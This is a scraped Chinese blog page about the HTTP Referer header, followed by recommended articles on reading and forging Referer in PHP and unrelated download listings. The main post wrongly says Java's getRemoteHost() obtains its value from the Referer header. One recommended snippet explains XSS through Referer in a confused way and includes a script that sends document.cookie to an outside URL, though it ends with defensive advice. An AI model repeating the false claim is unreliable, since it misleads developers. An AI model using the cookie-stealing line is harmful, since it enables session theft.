HTTP_REFERER

最新推荐文章于 2021-03-24 17:51:16 发布
最新推荐文章于 2021-03-24 17:51:16 发布
阅读量736 收藏
点赞数
分类专栏: NetWork 文章标签: http协议 浏览器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lvzhuyiyi4/article/details/14524495
版权

今天看了java中的httpRequest的一个方法:


HttpServletRequest req = (HttpServletRequest)request;
 
String requestingHost = req.getRemoteHost();


getRemoteHost()这个到底是如何获得的呢?

还是依靠http协议中的一个属性。

HTTP Referer是header的一部分,当浏览器向服务器发送请求时,一般会带上这个Referer是从哪里进来的。因而,服务器可以视情况进行处理。


而且,浏览器中(chrome)有个现象,你刷新页面时,这个 HTTP Referer 是不去除掉的

HTTP_REFERER的用法及伪造
易天海
08-10 1875
https://blog.csdn.net/u011250882/article/details/49679535 引言 在php中,可以使用$_SERVER[‘HTTP_REFERER’]来获取HTTP_REFERER信息,关于HTTP_REFERER,php文档中的描述如下: “引导用户代理到当前页的前一页的地址(如果存在)。由 user agent 设置决定。并不是所有的用户代理都会设置该项,有的还提供了修改 HTTP_REFERER 的功能。简言之,该值并不可信。 ” 在百度百科中,对于
php httpreferer,php中HTTP_REFERER函数用法实例
weixin_39575007的博客
03-10 924
这篇文章主要介绍了php中HTTP_REFERER函数用法,以实例的形式分别讲述了判断用户来路与伪造来路地址等应用,需要的朋友可以参考下本文实例分析了php中HTTP_REFERER函数用法。分享给大家供大家参考。具体分析如下:利用php的http_referer函数来判断用户的来路,这是比较简单的,实例代码如下:复制代码 代码如下:if (isset($_SERVER['HTTP_REFERER...
篡改referer_HTTP_REFERER的用法及伪造
weixin_29615645的博客
12-24 2216
引言在php中,可以使用$_SERVER[‘HTTP_REFERER’]来获取HTTP_REFERER信息,关于HTTP_REFERER,php文档中的描述如下:“引导用户代理到当前页的前一页的地址(如果存在)。由 user agent 设置决定。并不是所有的用户代理都会设置该项,有的还提供了修改HTTP_REFERER 的功能。简言之,该值并不可信。 ”在百度百科中,对于该参数的描述如下:“HT...
php $_server['http_referer'] 未定义,$ _SERVER ['HTTP_REFERER']丢失
weixin_39611037的博客
03-22 490
我想$_SERVER['HTTP_REFERER']在我的网站上使用,但得到以下信息:Notice: Undefined index: HTTP_REFERER我试过打印$_SERVER。输出以下内容:Array([HTTP_HOST] => 192.168.1.10[HTTP_USER_AGENT] => Mozilla/5.0 (X11; Ubuntu; Linux i686; r...
php怎么添加Referer,php中HTTP_REFERER函数用法实例,phphttp_referer_PHP教程
weixin_39986169的博客
03-20 497
php中HTTP_REFERER函数用法实例,phphttp_referer本文实例分析了php中HTTP_REFERER函数用法。分享给大家供大家参考。具体分析如下:利用php的http_referer函数来判断用户的来路,这是比较简单的,实例代码如下:代码如下:if (isset($_SERVER['HTTP_REFERER'])) {print "The page you were on p...
tp获取referer里的域名_php HTTP_REFERER获取不值来伪造一个HTTP_REFERER请求
weixin_30341571的博客
02-11 618
HTTP_REFERER这个是作用是返回上一个页面地址包,但有时会取不到,我们可以模仿它来做下面来看二种在正常的$_SERVER[\\\'HTTP_REFERER\\\']取不到值的处理方法。//简单关于HTTP_REFERER一 代码如下 复制代码 $phpSelf = isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_S...
php 获取http referer,php $_SERVER['HTTP_REFERER']获取上一页的URL地址
weixin_39875832的博客
03-24 548
php $_SERVER["HTTP_REFERER"]变量可以获取上一个或前一个页面的URL地址。比如有一个a.php页面,这个页面上有一个链接指向b.php页面,如果我们在a.php页面上点击这个链接,此时页面会到达b.php页面,在b.php页面输出$_SERVER["HTTP_REFERER"]变量,结果会显示a.php页面的地址。如果页面是直接在浏览器打开的,则$_SERVER["HTT...
php使用referer,php中HTTP_REFERER函数用法实例
weixin_35723352的博客
03-09 571
本文实例分析了php中HTTP_REFERER函数用法。分享给大家供大家参考。具体分析如下:利用php的http_referer函数来判断用户的来路,这是比较简单的,实例代码如下:if (isset($_SERVER['HTTP_REFERER'])) {print "The page you were on previously was {$_SERVER['HTTP_REFERER']}";}...
php 获取http referer,PHP-http_referer如何获取带#号的url?
weixin_39898550的博客
03-10 484
$_SERVER['HTTP_REFERER'] 不总是真实正确的,而且也有可能会被伪造没有特别好的办法,通过js的location.hash或者location.href来获取这个值,然后传给服务器吧上面的原理够告诉你了,以下代码满足你吧aaaaabbbbvar a = document.getElementsByTagName("a");for(var i in a){var url = (a...
完美兼容各大浏览器获取HTTP_REFERER方法总结
12-13
在网页开发中,HTTP_REFERER头信息是一个非常重要的字段,它标识了用户是从哪个页面跳转到当前页面的。然而,由于各个浏览器之间的实现差异,获取HTTP_REFERER的方式并不总是相同,尤其是在Internet Explorer(IE)...
php 伪造HTTP_REFERER页面URL来源的三种方法
12-18
php获取当前页面的前一个页面URL地址,即当前页面是从哪个页面链接过来的,可以使用$_SERVER[‘HTTP_REFERER’],但是这个来源页面的URL地址是可以被伪造和欺骗的,本文章向大家介绍伪造HTTP_REFERER页面URL的三种...
php中HTTP_REFERER函数用法实例
10-25
PHP中的HTTP_REFERER函数是PHP语言中用于获取HTTP请求头中的Referer(推荐人)字段的值。这个字段通常由浏览器在发送请求到服务器时自动填充,表明用户是从哪个页面链接过来的。然而,需要注意的是,HTTP_REFERER...
alexnet模型-通过CNN卷积神经网络的动漫角色识别-不含数据集图片-含逐行注释和说明文档.zip
最新发布
11-07
本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 首先是代码的整体介绍 总共是3个py文件,十分的简便 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01生成txt.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集 运行02CNN训练数据集.py,会自动读取txt文本内的内容进行训练,这里是适配了数据集的分类文件夹个数,即使增加了分类文件夹,也不需要修改代码即可训练 训练过程中会有训练进度条,可以查看大概训练的时长,每个epoch训练完后会显示准确率和损失值 训练结束后,会保存log日志,记录每个epoch的准确率和损失值 最后训练的模型会保存在本地名称为model.ckpt 运行03pyqt界面.py,就可以实现自己训练好的模型去识别图片了
电商购物网站 SSM毕业设计 附带论文.zip
11-07
电商购物网站 SSM毕业设计 附带论文 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
题目源码2024年强网杯全国网络安全挑战赛 Pwn题目chat-with-me源码
11-07
强网杯
mobilenet模型-基于深度学习AI算法对建筑装饰风格识别-不含数据集图片-含逐行注释和说明文档.zip
11-07
本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 首先是代码的整体介绍 总共是3个py文件,十分的简便 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01生成txt.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集 运行02CNN训练数据集.py,会自动读取txt文本内的内容进行训练,这里是适配了数据集的分类文件夹个数,即使增加了分类文件夹,也不需要修改代码即可训练 训练过程中会有训练进度条,可以查看大概训练的时长,每个epoch训练完后会显示准确率和损失值 训练结束后,会保存log日志,记录每个epoch的准确率和损失值 最后训练的模型会保存在本地名称为model.ckpt 运行03pyqt界面.py,就可以实现自己训练好的模型去识别图片了
2-数字化转型对企业劳动力就业的影响的研究数据(2001-2021年).zip
11-07
随着数字技术和企业数字化转型的推进,企业的人力资源管理方式也在不断的变化,尤其是企业数字化转型对劳动力就业产生了深远的影响。 传统制造企业的工作模式一般是人工操作,处于低劳动力成本下的位置,而数字化转型要求企业应用物联网、云计算、大数据等先进技术,提高生产效率和减少人力成本。 数字化转型对企业劳动力就业的影响是多方面的,除替代性影响外,还会给企业带来新的机会,促进员工自我提升和企业人力资源管理意识的提高。本数据的整理让大家能够更清晰了解数字化转型对有关企业劳动力就业的影响。 相关数据指标 企业年龄 , 资产负债率 , 流动比率 , 股权集中度 , 所有制性质, 总资产收益率, 地区人均GDP
非常好的电子设计小软件GIF2BMP非常好用的软件.zip
11-07
非常好的电子设计小软件GIF2BMP非常好用的软件.zip
HTTP_REFERER的xss
10-13
HTTP_REFERER是HTTP协议中的一个请求头字段,用于标识请求来源页面的URL地址。在Web应用程序中,可以使用HTTP_REFERER来判断请求是否来自可信的来源页面,从而防止跨站点请求伪造(CSRF)攻击。但是,由于HTTP_REFERER可以被伪造,因此在某些情况下,攻击者可以利用HTTP_REFERER来进行XSS攻击。 具体来说,攻击者可以通过构造恶意页面,在其中注入一段JavaScript代码,并将该页面的URL地址设置为目标网站的URL地址。当用户访问恶意页面后,浏览器会将目标网站的URL地址作为HTTP_REFERER发送给目标网站服务器。如果目标网站没有对HTTP_REFERER进行有效的过滤和验证,那么攻击者就可以利用HTTP_REFERER来执行XSS攻击。 例如,攻击者可以在恶意页面中注入以下代码: ```javascript <script> var img = new Image(); img.src = "http://www.target.com/submit?data=" + document.cookie; </script> ``` 当用户访问恶意页面后,浏览器会将目标网站的URL地址作为HTTP_REFERER发送给目标网站服务器。如果目标网站没有对HTTP_REFERER进行有效的过滤和验证,那么攻击者就可以在目标网站上执行上述JavaScript代码,从而窃取用户的Cookie信息。 为了防止HTTP_REFERER的XSS攻击,Web应用程序可以采取以下措施: 1. 对HTTP_REFERER进行有效的过滤和验证,只允许来自可信的来源页面的请求通过; 2. 在HTTP响应头中设置Referrer-Policy,指定HTTP_REFERER的发送策略; 3. 在Web应用程序中使用CSRF Token等技术来防止CSRF攻击,从而减少HTTP_REFERER的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值